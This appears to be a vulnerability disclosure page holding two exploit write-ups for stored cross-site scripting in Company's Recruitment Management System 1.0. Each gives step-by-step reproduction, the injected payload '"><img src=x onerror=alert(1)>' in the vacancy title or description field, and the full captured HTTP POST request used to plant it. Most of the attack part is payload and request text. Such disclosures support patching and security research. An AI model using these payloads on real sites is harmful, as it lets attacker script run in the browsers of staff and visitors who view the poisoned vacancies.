Company's Recruitment Management System 1.0 Cross Site Scripting

Company's Recruitment Management System version 1.0 suffers from multiple persistent cross site scripting vulnerabilities.


MD5 | 28678555a8cf4b00193ea2094ef2c2b4

# Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
# Date: 17-10-2021
# Exploit Author: Aniket Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Steps to Reproduce:
1)Navigate to http://127.0.0.1/employment_application & Login with staff account .
2) Navigate to vacancies tab
3) Click on Add new .
4)Add Payload
"><img src=x onerror=alert(1)>

in Vacancy Title field.

5)Click on Save and you are done. It's gonna be triggered when anyone
visits the application.

Request:-

POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------15502044322641666722659366422
Content-Length: 931
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cache-Control: no-transform

-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="id"


-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="title"

"><img src=x onerror=alert(1)>
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="designation_id"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="slots"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="status"

1
-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="description"


-----------------------------15502044322641666722659366422
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------15502044322641666722659366422--



---------------------

# Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10,XAMPP

Step to reproduce:-
1)Login with staff account & Navigate to Vacancies tab.

2)Click on add new vacancies .Put any random information on other field except description & go to the description window .

3)In the description field select insert link .

5) In Text to display the field add the following payload .

"><img src=x onerror=alert(1)>

*6)Click on save & you are done.It's gonna be triggered when some one open
vacancies details *

Request:-

POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0)
Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------156186133432167175201476666002
Content-Length: 1012
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="id"


-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="title"

Test1ee
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="designation_id"

4
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="slots"

1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="status"

1
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="description"

<p><br><a href="http://google.com" target="_blank">"><img src="x"
onerror="alert(1)"></a></p>
-----------------------------156186133432167175201476666002
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------156186133432167175201476666002--

Related Posts